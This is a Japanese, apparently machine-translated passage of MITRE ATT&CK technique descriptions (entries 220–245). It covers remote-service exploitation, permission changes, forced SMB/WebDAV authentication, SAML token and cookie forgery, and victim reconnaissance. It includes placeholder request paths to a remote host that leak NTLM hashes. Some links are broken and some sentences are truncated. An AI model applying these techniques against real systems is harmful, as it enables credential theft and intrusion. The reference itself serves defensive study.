SMB(引用:CIS Multiple SMB Vulnerabilities)やRDP(引用:NVD CVE-2017-0176)などの一般的なサービスや、MySQL(引用:NVD CVE-2016-6662)やWebサーバサービスなどの内部ネットワーク内で使用される可能性のあるアプリケーションには、いくつかのよく知られた脆弱性が存在しています。(引用: NVDE-2014-7169)

脆弱なリモートサービスの権限レベルに応じて、敵対者は横移動の悪用の結果としても[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)を達成する可能性があります。
220
T1133 外部リモートサービス 敵対者は、外部に向けたリモートサービスを利用して、ネットワークに最初にアクセスしたり、ネットワーク内に留まったりすることがあります。VPN、Citrix などのリモートサービスは、ユーザが外部の場所から内部の企業ネットワークリソースに接続することを可能にします。これらのサービスへの接続や認証を管理するリモートサービスゲートウェイが存在することが多い。

サービスを利用するためには、[Valid Accounts](有効なアカウント)(https://attack.mitre.org/techniques/T1078)へのアクセスが必要になることが多く、クレデンシャル・ファーミングや、企業ネットワークを侵害した後にユーザーからクレデンシャルを入手することも可能です。(引用:Volexity Virtual Private Keylogging) リモートサービスへのアクセスは、操作中の冗長性や持続性のあるアクセスメカニズムとして使用されることがあります。

認証を必要としない公開されたサービスを介して、アクセスが得られることもあります。コンテナ環境では、公開されているDocker API、Kubernetes APIサーバ、kubelet、KubernetesダッシュボードなどのWebアプリケーションなどがこれに該当します。(引用:Trend Micro Exposed Docker Server)(引用:Unit 42 Hildegard Malware)
221
T1008 フォールバックチャンネル 敵対者は、信頼性の高いコマンド&コントロールを維持し、データ転送のしきい値を回避するために、プライマリチャネルが侵害されたり、アクセスできなかったりした場合、フォールバックまたは代替の通信チャネルを使用することがあります。 222
T1083 ファイルとディレクトリの発見 敵対者は、ファイルやディレクトリを列挙したり、ホストやネットワーク共有の特定の場所でファイルシステム内の特定の情報を検索したりすることがあります。敵対者は、自動検出中に[File and Directory Discovery](https://attack.mitre.org/techniques/T1083)から得た情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。

この情報を得るために、多くのコマンドシェルユーティリティを使用することができます。例えば、<code>dir</code>、<code>tree</code>、<code>ls</code>、<code>find</code>、<code>locate</code>などです。(引用:Windows Commands JPCERT) また、ファイルやディレクトリの情報を収集したり、[Native API](https://attack.mitre.org/techniques/T1106)と対話するために、カスタムツールを使用することもできる。
223
T1222 ファイルとディレクトリの権限の変更 敵対者は、アクセス制御リスト(ACL)を回避し、保護されたファイルにアクセスするために、ファイルやディレクトリのパーミッション/属性を変更することがあります。(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) ファイルやディレクトリのパーミッションは、一般的に、ファイルやディレクトリの所有者、または適切なパーミッションを持つユーザーによって設定されたACLによって管理されます。ファイルとディレクトリのACLの実装はプラットフォームによって異なりますが、一般的には、どのユーザーやグループがどのアクション(読み取り、書き込み、実行など)を実行できるかを明示的に指定します。

修正には、特定のアクセス権の変更が含まれる場合がありますが、これには、ファイルやディレクトリの所有権を取得すること、および/または、ファイルやディレクトリの既存のパーミッションに応じてパーミッションを昇格させることが必要な場合があります。これにより、特定のファイルやディレクトリの修正、置き換え、削除などの悪意のある活動が可能になる場合があります。特定のファイルやディレクトリの変更は、「アクセシビリティ機能」(https://attack.mitre.org/techniques/T1546/008)、「ブートまたはログオン初期化スクリプト」(https://attack.mitre.org/techniques/T1037)、「Unixシェル構成の変更」(https://attack.mitre.org/techniques/T1546/004)、「ハイジャック実行フロー」(https://attack.mitre.org/techniques/T1574)による他の機器のバイナリ/構成ファイルの汚染/ハイジャックなど、多くの技術にとって必要なステップとなり得ます。
224
T1222.002 ファイルとディレクトリのパーミッションの変更LinuxとMacのファイルとディレクトリのアクセス権の変更 敵対者は、アクセス制御リスト(ACL)を回避し、保護されたファイルにアクセスするために、ファイルやディレクトリのパーミッション/属性を変更することがあります。(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) ファイルやディレクトリのパーミッションは、一般的に、ファイルやディレクトリの所有者、または適切なパーミッションを持つユーザーによって設定されたACLによって管理されます。ファイルやディレクトリのACLの実装はプラットフォームによって異なりますが、一般的には、どのユーザーやグループがどのアクション(読み取り、書き込み、実行など)を実行できるかを明示的に指定します。

ほとんどのLinuxおよびLinuxベースのプラットフォームは、パーミッショングループ(ユーザー、グループ、その他)と、各グループに適用されるパーミッション(読み取り、書き込み、実行)の標準的なセットを提供しています。各プラットフォームのパーミッションの実装のニュアンスは異なるかもしれませんが、ほとんどのプラットフォームでは、ファイルやディレクトリのACLを操作するために使用される2つの主要なコマンドが提供されています。<code>chown</code>(所有者の変更の略)と<code>chmod</code>(モードの変更の略)です。

敵対者は、これらのコマンドを使用して、自分自身をファイルやディレクトリの所有者にしたり、現在のパーミッションで許可されている場合はモードを変更したりすることができます。その後、他の人をそのファイルから閉め出すことができます。特定のファイルやディレクトリの変更は、[Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004)による永続性の確立や、[Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)による他の機器のバイナリ/設定ファイルの汚染/ハイジャックなど、多くの技術で必要なステップとなります。
225
T1222.001 ファイルとディレクトリの権限の変更。Windowsのファイルとディレクトリのアクセス権の変更 敵対者は、アクセス制御リスト(ACL)を回避し、保護されたファイルにアクセスするために、ファイルやディレクトリのパーミッション/属性を変更することがあります。(引用:Hybrid Analysis Icacls1 2018年6月)(引用:Hybrid Analysis Icacls2 2018年5月)ファイルやディレクトリのパーミッションは、一般的に、ファイルやディレクトリの所有者、または適切なパーミッションを持つユーザーによって設定されたACLによって管理されます。ファイルとディレクトリのACLの実装はプラットフォームによって異なりますが、一般的には、どのユーザーまたはグループがどのアクション(読み取り、書き込み、実行など)を実行できるかを明示的に指定します。

Windowsは、ファイルとディレクトリのACLをDACL(Discretionary Access Control Lists)として実装します。(引用:Microsoft DACL May 2018) 標準的なACLと同様に、DACLは、セキュリティ可能なオブジェクトへのアクセスを許可または拒否するアカウントを識別します。セキュアブル・オブジェクトへのアクセスが試みられると、システムはDACLのアクセス・コントロール・エントリを順にチェックします。一致するエントリが見つかると、そのオブジェクトへのアクセスが許可されます。そうでなければ、アクセスは拒否されます。(引用:Microsoft Access Control Lists May 2018)

敵対者は、`icacls`、`cacls`、`takeown`、`attrib`などのWindowsの組み込みコマンドを使用してDACLを操作することができ、敵対者に特定のファイルやフォルダーに対する高い権限を付与することができます。さらに、[PowerShell](https://attack.mitre.org/techniques/T1059/001)では、ファイルやディレクトリのDACLを取得または修正するために使用できるコマンドレットを提供しています。アクセシビリティ機能](https://attack.mitre.org/techniques/T1546/008)、[ブートまたはログオン初期化スクリプト](https://attack.mitre.org/techniques/T1037)による永続性の確立、[ハイジャック実行フロー](https://attack.mitre.org/techniques/T1574)による他の機器のバイナリ/設定ファイルの汚染/ハイジャックなど、多くのテクニックにおいて、特定のファイルやディレクトリの変更が必要になることがあります。
226
T1495 ファームウェアの破損 敵対者は、システムに接続されているデバイスのシステムBIOSやその他のファームウェアのフラッシュメモリの内容を上書きしたり、破壊したりして、デバイスを動作不能または起動不能にすることがあります(引用:Symantec Chernobyl W95.CIH)。 ファームウェアとは、デバイスの機能を初期化および管理するために、ハードウェアデバイスの不揮発性メモリからロードされ実行されるソフトウェアです。マザーボード、ハードドライブ、ビデオカードなどがこれにあたる。 227
T1187 強制認証

Server Message Block (SMB) プロトコルは、リソースへのアクセスやファイル共有のためのシステム間の認証および通信に、Windows ネットワークで一般的に使用されています。WindowsシステムがSMBリソースに接続しようとすると、自動的に認証が行われ、現在のユーザーの認証情報がリモートシステムに送信されます。(

WebDAV(Web Distributed Authoring and Versioning)は、SMBがブロックされたり故障した場合のバックアッププロトコルとして、Windowsシステムで使用されている。WebDAVはHTTPを拡張したもので、通常はTCPポート80と443で動作します。(Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

敵対者は、この動作を利用して、強制的な SMB/WebDAV 認証によりユーザーアカウントのハッシュにアクセスすることができます。敵対者は、スピアフィッシングにより、敵対者が管理する外部サーバへのリソースリンクを含む添付ファイルをユーザに送信したり(例:[テンプレート・インジェクション](https://attack.mitre.org/techniques/T1221))、特別に細工したファイルを特権アカウントのナビゲーションパスに置いたり(例:.SCFファイルをデスクトップに置く)、一般にアクセス可能な共有に置いて被害者がアクセスできるようにしたりすることができます。ユーザーのシステムが信頼されていないリソースにアクセスすると、認証を試み、ユーザーのハッシュ化された認証情報を含む情報をSMB経由で敵の制御するサーバーに送信します。(引用:GitHub Hashjacking) 資格情報のハッシュにアクセスできると、敵対者はオフラインで[Brute Force](https://attack.mitre.org/techniques/T1110)クラッキングを行い、平文の資格情報にアクセスできるようになります。(Citation: Cylance Redirect to SMB)

これにはいくつかの異なる方法があります。(引用:Osanda Stealing NetNTLM Hashes) 具体的には、以下のような方法があります。

* ドキュメントを開いたときに自動的に読み込まれるリソースを含むドキュメントを含むスピアフィッシングの添付ファイル(例:[テンプレート・インジェクション](https://attack.mitre.org/techniques/T1221))。この文書には、例えば、<code>file[:]//[remote address]/Normal.dotm</code>に似たリクエストを含めて、SMBリクエストを引き起こすことができます。(Citation: US-CERT APT Energy Oct 2017)
* アイコンのファイル名が<code>\[remote address]\pic.png</code>のような外部参照を指している修正された.LNKまたは.SCFファイルで、繰り返し認証情報を収集するためにアイコンがレンダリングされたときにシステムがリソースをロードするように仕向けます。(引用:US-CERT APT Energy 2017年10月号)
228
T1606 ウェブ証明書の作成 敵対者は、ウェブアプリケーションやインターネットサービスへのアクセスに使用できるクレデンシャル資料を偽造する可能性があります。ウェブアプリケーションやサービス(クラウドのSaaS環境やオンプレミスのサーバーでホストされている)では、ユーザーのアクセスを認証・許可するために、セッションクッキーやトークンなどを使用することがよくあります。

敵対者は、ウェブリソースへのアクセスを得るために、これらのクレデンシャルマテリアルを生成することがあります。これは、[Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)、[Steal Application Access Token](https://attack.mitre.org/techniques/T1528)などの類似した動作とは異なり、認証情報は正当なユーザから盗んだり傍受したりするのではなく、敵対者が新たに偽造したものです。Web クレデンシャルの生成には、パスワード、[Private Key](https://attack.mitre.org/techniques/T1552/004)、またはその他の暗号シード値などの秘密の値が必要になることがよくあります。(引用:GitHub AWS-ADFS-Credential-Generator)

一旦偽造されると、敵対者はこれらの Web クレデンシャルを使用してリソースにアクセスすることができます(例:[Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550))、多要素認証やその他の認証保護メカニズムをバイパスする可能性があります。(引用:Pass The Cookie)(引用:Unit 42 Mac Crypto Cookies January 2019)(引用:Microsoft SolarWinds Customer Guidance)
229
T1606.002 Forge Web Credentials:SAMLトークン 敵対者は、有効なSAMLトークン署名証明書を所有していれば、任意のパーミッション・クレームとライフタイムを持つSAMLトークンを偽造することができる。(引用:Microsoft SolarWinds Steps) SAMLトークンのデフォルトのライフタイムは1時間であるが、トークンの<code>conditions ...</code>要素の<code>NotOnOrAfter</code>値で有効期間を指定することができる。この値は、<code>LifetimeTokenPolicy</code>の<code>AccessTokenLifetime</code>を使用して変更することができます。(引用:Microsoft SAML Token Lifetimes) 偽造されたSAMLトークンは、SSO(Single Signing)としてSAML 2.0を使用しているサービス間で、敵対者が認証を行うことを可能にします。(引用:Cyberark Golden SAML)

敵対者は、[Private Keys](https://attack.mitre.org/techniques/T1552/004)を利用して組織のトークン署名証明書を侵害し、偽造 SAML トークンを作成することがあります。敵対者が自分のActive Directory Federation Services(AD FS)サーバーとの間で新しいフェデレーション信頼関係を確立するのに十分な権限を持っている場合、代わりに自分の信頼できるトークン署名証明書を生成することができる。(引用:Microsoft SolarWinds Customer Guidance)これは、[Steal Application Access Token](https://attack.)とは異なる。mitre.org/techniques/T1528)などとは異なり、トークンは正当なユーザーから盗んだり傍受したりするのではなく、敵対者が新たに偽造したものです。

高度な特権を持つアカウントを代表すると主張するSAMLトークンが偽造された場合、敵対者はAzure ADの管理者権限を獲得する可能性があります。これにより、[Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)となり、多要素認証やその他の認証保護メカニズムをバイパスする可能性があります。(引用元:Microsoft SolarWinds Customer Guidance)
230
T1606.001 ウェブ証明書を偽造する。ウェブクッキー 敵対者は、ウェブアプリケーションやインターネットサービスへのアクセスに使用されるウェブクッキーを偽造する可能性があります。Web アプリケーションやサービス(クラウドの SaaS 環境やオンプレミスのサーバーでホストされている)は、ユーザーのアクセスを認証・許可するためにセッション・クッキーを使用することがよくあります。

敵対者は、Web リソースへのアクセスを得るためにこれらのクッキーを生成することがあります。これは、[Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)やその他の類似した行動とは異なり、クッキーは正当なユーザから盗んだり傍受したりするのではなく、敵対者が新たに偽造したものです。ほとんどの一般的なウェブ・アプリケーションは、標準化され文書化されたクッキー値を持っており、提供された ツールやインタフェースを使って生成することができます(引用: Pass The Cookie)。ウェブ・クッキーの生成には、パスワードや [Private Key](https://attack.mitre.org/techniques/T1552/004)、その他の暗号シード値などの秘密の値を必要とすることがよくあります。

いったん偽造されると、敵対者はこれらのウェブ・クッキーを使用してリソースにアクセスし([ウェブ・セッション・クッキー](https://attack.mitre.org/techniques/T1550/004))、多要素および他の認証保護メカニズムを迂回する可能性があります。(引用:Volexity SolarWinds)(引用:Pass The Cookie)(引用:Unit 42 Mac Crypto Cookies January 2019)
231
T1592 被害者ホスト情報の収集 敵対者は、標的化の際に利用可能な被害者のホストに関する情報を収集することがあります。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法で情報を収集することがあります。また、敵対者は、サイトを侵害して、訪問者からホスト情報を収集するように設計された悪意のあるコンテンツを含めることもあります(引用:ATT ScanBox)。ホストに関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)または[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して敵対者にさらされることもあります。この情報を集めることで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用資源の確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)または[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会が得られる可能性があります。
232
T1592.004 犠牲者のホスト情報を収集するクライアントの設定 敵対者は、標的化の際に使用できる、被害者のクライアントの構成に関する情報を収集することがあります。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595) (例: リスニングポート、サーババナー、ユーザエージェント文字列)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法でこの情報を収集します。また、敵対者は、サイトを侵害して、訪問者からホスト情報を収集するように設計された悪意のあるコンテンツを含めることもあります。(引用:ATT ScanBox)クライアントの構成に関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:求人情報、ネットワークマップ、評価レポート、履歴書、購入請求書)を通じて敵対者に公開されることもあります。この情報を収集することで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)または[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会が見つかるかもしれません。
233
T1592.003 犠牲者のホスト情報を収集する。ファームウェア 敵対者は、ターゲティングの際に利用可能な、被害者のホストのファームウェアに関する情報を収集することがあります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な情報収集など、様々な方法でこの情報を収集することができる。ホストのファームウェアに関する情報は、オンラインやその他のアクセス可能なデータセット(例:求人情報、ネットワーク・マップ、評価レポート、履歴書、購入請求書)を介してのみ、敵対者に公開される可能性があります(引用:ArsTechnica Intel)。この情報を収集することで、他の形態の偵察の機会が得られるかもしれません(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)または[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190))。
234
T1592.001 被害者のホスト情報の収集ハードウェア 敵対者は、標的となる被害者のホストハードウェアに関する情報を収集することがあります。ハードウェアインフラストラクチャに関する情報には、特定のホストのタイプやバージョン、追加の防御策を示す追加コンポーネントの存在(例:カード/生体認証リーダー、専用の暗号化ハードウェアなど)など、さまざまな詳細情報が含まれます。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595) (例:ホスト名、サーババナー、ユーザエージェント文字列)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)を介した直接的な収集行為など、さまざまな方法でこの情報を収集する可能性があります。また、敵対者は、サイトを侵害して、訪問者からホスト情報を収集するように設計された悪意のあるコンテンツを含めることもあります(引用:ATT ScanBox)。ハードウェアインフラに関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:求人情報、ネットワークマップ、評価レポート、履歴書、購入請求書)を通じて敵対者に公開されることもあります。この情報を収集することで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003)または[Hardware Additions](https://attack.mitre.org/techniques/T1200))の機会が得られる可能性があります。
235
T1592.002 被害者ホスト情報の収集ソフトウェア 敵対者は、標的化の際に利用できる被害者のホストソフトウェアに関する情報を収集することがあります。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595) (例: リスニングポート、サーババナー、ユーザエージェント文字列)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、様々な方法でこの情報を収集します。また、敵対者は、サイトを侵害して、訪問者からホスト情報を収集するように設計された悪意のあるコンテンツを含めることもあります(引用:ATT ScanBox)。インストールされたソフトウェアに関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:求人情報、ネットワークマップ、評価レポート、履歴書、購入請求書)を通じて敵対者に公開されることもあります。この情報を収集することで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195)または[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会が見つかる可能性があります。
236
T1589 被害者の身元情報の収集 敵対者は、ターゲティングの際に使用できる被害者のアイデンティティに関する情報を収集することがあります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)を介して直接情報を引き出すなど、さまざまな方法でこの情報を収集することがあります。また、被害者に関する情報は、オンラインやその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)や[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して敵対者にさらされることもあります。(引用: OPM Leak)(引用: Register Deloitte)(引用: Register Uber)(引用: Detectify Slack Tokens)(引用: Forbes GitHub Creds)(引用: GitHub truffleHog)(引用: GitHub Gitrob)(引用: CNET Leaks) これらの情報を集めることで、他の形態の偵察の機会を得ることができるかもしれません(例: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)など)、運用リソースの確立(例:[Compromise Accounts](https://attack.mitre.org/techniques/T1586)など)、初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566)や[Valid Accounts](https://attack.mitre.org/techniques/T1078)など)の機会が得られるかもしれません。
237
T1589.001 被害者の身元情報を集めるクレデンシャル 敵対者は、標的化の際に使用可能な認証情報を収集することがあります。

敵対者は、[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接の聞き出しなど、さまざまな方法で潜在的な被害者から認証情報を収集することがあります。また、敵対者は、サイトを侵害し、訪問者からウェブサイト認証クッキーを収集するように設計された悪意のあるコンテンツを含むこともあります(引用:ATT ScanBox)。クレデンシャル情報は、オンラインまたはその他のアクセス可能なデータセットへのリークを通じて敵対者にさらされることもあります(例:[Search Engines](https://attack.mitre.(引用: Register Deloitte)(引用: Register Uber)(引用: Detectify Slack Tokens)(引用: Forbes GitHub Creds)(引用: GitHub truffleHog)(引用: GitHub Gitrob)(引用: CNET Leaks) 敵対者はダークウェブやその他のブラックマーケットからクレデンシャルを購入することもあります。これらの情報を収集することで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Phishing for Information](https://attack.mitre.org/techniques/T1598))、運用リソースの確立(例:[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)または[Valid Accounts](https://attack.mitre.org/techniques/T1078))の機会が得られる可能性があります。
238
T1589.002 被害者の身元情報を集める。電子メール・アドレス 敵対者は、ターゲティングに利用可能な電子メールアドレスを収集することがあります。

敵対者は、オンラインやその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)や[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して容易に入手・公開できる可能性があるため、電子メールアドレスを容易に収集することができます。(引用:HackersArise Email)(引用:CNET Leaks) この情報を集めることで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)や、運用リソースの確立(例:[Email Accounts](https://attack.mitre.org/techniques/T1586/002))や、初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566))の機会が得られるかもしれません。)
239
T1589.003 被害者の身元情報を集める従業員の名前 敵対者は、ターゲティングに利用可能な従業員名を収集することがあります。

従業員の名前は、オンラインやその他のアクセス可能なデータセット(例:[Social Media](https://attack.mitre.org/techniques/T1593/001)や[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594))を介して容易に入手でき、公開されている可能性があるため、敵対者は従業員の名前を簡単に収集することができます。(この情報を集めることで、他の形態の偵察(例:[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)または[Phishing for Information](https://attack.mitre.org/techniques/T1598))、運用リソースの確立(例:[Compromise Accounts](https://attack.mitre.org/techniques/T1586))、および/または初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566)または[Valid Accounts](https://attack.mitre.org/techniques/T1078))の機会が見つかるかもしれません。
240
T1590 被害者ネットワーク情報の収集 敵対者は、標的化の際に利用できる被害者のネットワークに関する情報を収集することがあります。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法でこの情報を収集する可能性があります。また、ネットワークに関する情報は、オンラインやその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))。(引用:WHOIS)(引用:DNS Dumpster)(引用:Circl Passive DNS) これらの情報を収集することで、他の形態の偵察の機会を得ることができるかもしれません(例:[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)や[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)など)、初期アクセス(例:[Trusted Relationship](https://attack.mitre.org/techniques/T1199)など)の機会があるかもしれません。
241
T1590.002 被害者のネットワーク情報を収集する。DNS 敵対者は、標的化の際に使用できる被害者のDNSに関する情報を収集することがあります。

敵対者は、[DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001)を介してクエリやその他の方法で詳細を収集するなど、さまざまな方法でこの情報を収集する可能性があります。DNS情報は、オンラインまたはその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))。(引用:DNS Dumpster)(引用:Circl Passive DNS) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)、[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)、または[Active Scanning](https://attack.mitre.org/techniques/T1595))、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)または[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133))。
242
T1590.001 被害者のネットワーク情報を収集するドメインの特性 敵対者は、被害者のネットワークドメインに関する情報を収集し、標的化に利用することがあります。ドメインとそのプロパティに関する情報には、被害者がどのドメインを所有しているか、管理データ(名前、レジストラなど)、連絡先(メールアドレス、電話番号)、ビジネスアドレス、ネームサーバなどのより直接的に行動可能な情報など、さまざまな詳細情報が含まれます。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法でこの情報を収集する可能性があります。また、被害者のドメインとそのプロパティに関する情報は、オンラインまたはその他のアクセス可能なデータセット(例:[WHOIS](https://attack.mitre.org/techniques/T1596/002))を介して敵対者に公開されることもあります。(引用:WHOIS)(引用:DNS Dumpster)(引用:Circl Passive DNS) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)、[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)、[Phishing for Information](https://attack.mitre.org/techniques/T1598))、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)または[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、および/または初期アクセス(例:[Phishing](https://attack.mitre.org/techniques/T1566))の機会が得られるかもしれません。
243
T1590.005 被害者のネットワーク情報を収集する。IPアドレス 敵対者は、ターゲティングの際に使用できる被害者のIPアドレスを収集することがあります。パブリックIPアドレスは、ブロック単位で組織に割り当てられる場合と、連続したアドレスの範囲で割り当てられる場合があります。割り当てられたIPアドレスに関する情報には、どのIPアドレスが使用されているかなど、さまざまな詳細情報が含まれる場合があります。また、IPアドレスから、組織の規模、物理的な所在地、インターネットサービスプロバイダ、公開されているインフラのホスト場所や方法など、被害者に関するその他の詳細情報を得ることができる場合もあります。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法でこの情報を収集することができます。割り当てられたIPアドレスに関する情報は、オンラインまたはその他のアクセス可能なデータセットを通じて敵対者に公開されることもあります(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596))。(引用:WHOIS)(引用:DNS Dumpster)(引用:Circl Passive DNS) この情報を収集することで、他の形態の偵察の機会が得られる可能性があります(例:[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)など)、運用資源の確立(例:[Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)や[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)など)、初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133)など)の機会があるかもしれません。
244
T1590.006 被害者のネットワーク情報を収集する。ネットワークセキュリティアプライアンス 敵対者は、ターゲティングの際に利用できる、被害者のネットワークセキュリティ機器に関する情報を収集することがあります。ネットワークセキュリティ機器に関する情報には、導入されているファイアウォール、コンテンツフィルタ、プロキシ/ベースメントホストの有無や仕様など、さまざまな詳細情報が含まれます。

敵対者は、[Active Scanning](https://attack.mitre.org/techniques/T1595)や[Phishing for Information](https://attack.mitre.org/techniques/T1598)による直接的な収集行為など、さまざまな方法でこの情報を収集することができます。(引用:Nmap Firewalls NIDS) ネットワークセキュリティ機器に関する情報は、オンラインまたはその他のアクセス可能なデータセットを介して敵対者に公開されることもあります(例:[Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)など)。この情報を収集することで、他の形態の偵察(例:[Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)または[Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593))、運用リソースの確立(例:[Develop Capabilities](https://attack.mitre.org/techniques/T1587)または[Obtain Capabilities](https://attack.mitre.org/techniques/T1588))、および/または初期アクセス(例:[External Remote Services](https://attack.mitre.org/techniques/T1133))の機会が得られる可能性があります。
245
T1590.004 被害者のネットワーク情報の収集ネットワークトポロジー 敵対者は、ターゲティングの際に使用できる、被害者のネットワークトポロジーに関する情報を収集することがあります。ネットワークトポロジーに関する情報には、外部と内部の両方のネットワーク環境の物理的または論理的な配置など、さまざまな詳細情報が含まれます。

